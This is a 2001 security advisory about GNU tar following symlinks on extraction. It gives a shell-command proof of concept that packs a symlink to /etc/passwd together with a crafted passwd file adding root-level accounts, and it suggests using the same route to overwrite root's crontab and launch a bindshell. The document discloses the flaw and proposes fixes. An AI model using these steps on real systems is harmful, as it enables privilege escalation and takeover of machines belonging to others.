tar-symlink.txt

`Title : GNU tar (Tape ARchive) symlinkvulnerability  
Author : Marco van Berkum  
Organisation : OBIT b.v.  
URL : http://www.obit.nl  
Email : [email protected]  
Date : 06-01-2001  
  
The usefull program tar (Tape ARchive) is used by all UNIX, Linux and  
BSD  
versions around and is used to ARCHIVE files to disk or tape in a easy  
portable format.  
  
While this program has been used for a long time there seemed to be no  
need to fix the problem of following symlinks in a archive.  
The problem is that tar follows symlinks without questioning whether  
this  
is a file which is harmless or a file such as /etc/passwd.  
This way it will be possible to overwrite ANY file on the system when  
untarred as root (NOT DONE).  
  
How can this be done?  
  
Well, you create a directory as test to see the effect of a tarred  
symlink  
  
% mkdir test  
% cd test  
% ln -s /etc/passwd passwd  
% ls -al  
total 2  
drwx--x--x 2 user user 1024 Aug 7 13:08 ./  
drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../  
lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd ->  
/etc/passwd  
%  
  
You now have a symlink to /etc/passwd, next we are going to tar this  
symlink.  
  
% tar -cvf test.tar *  
% ls -al  
total 12  
drwx--x--x 2 user user 1024 Aug 7 13:11 ./  
drwxr-xr-x 27 user user 1024 Aug 7 13:08 ../  
lrwxrwxrwx 1 user user 11 Aug 7 13:08 passwd ->  
/etc/passwd  
-rw------- 1 user user 10240 Aug 7 13:11 test.tar  
%  
  
Lets see whats in the tarfile now  
  
% tar -tf test.tar  
passwd <- AHA a symlink ;)  
%  
  
This is not visible as symlink when you do -tf !!  
It would be when doing tar -tvf (verbose).  
  
So next we remove the symlink from the testdirectory  
  
% rm passwd  
  
We now have only the tarfile with the symlink to /etc/passwd, next we  
create our own passwdfile  
  
% echo "root:our_password_string:0:0::/root:/bin/bash" >passwd  
% echo "hax0r:our_password_string:1000:100::/tmp:/bin/bash" >>passwd  
  
Ok now whe have a test.tar and a passfile, all we would have to do is  
simply append the passwordfile to the tarfile.  
  
% tar -rf test.tar passwd  
  
Now list it  
  
% tar -tf test.tar  
passwd <- AHA a symlink ;)  
passwd <- our evil passwdfile  
%  
  
Now one can image what happens when this tarfile is extracted as root,  
it  
will create a symlink to /etc/passwd and overwrite it with ours.  
Ofcourse this is possible with all files on the system, one of the most  
malicious things to do would be overwriting the rootcrontab and execute  
commands that way.  
Even programs like bindshell can be executed this way by making a  
symlink  
to say /tmp, dump the bindshell binary/source to /tmp and make a  
rootcrontab pointing to that file by executing or compiling and  
executing  
it wich will leave us with a rootshell ;)  
  
Solution:  
  
Well, obviously one should NEVER untar files as root, but a patch to  
the tarprogram wich enhances tar by asking wether it should follow  
symlinks or not would do the trick aswell.  
  
grtz,  
Marco van Berkum  
--  
Sex is like hacking. You get in, you get out,  
and you hope you didn't leave something behind  
that can be traced back to you.  
  
Marco van Berkum, System Operator/Security Analyst OBIT b.v.  
RIPEHANDLE: MB17300-RIPE  
  
  
`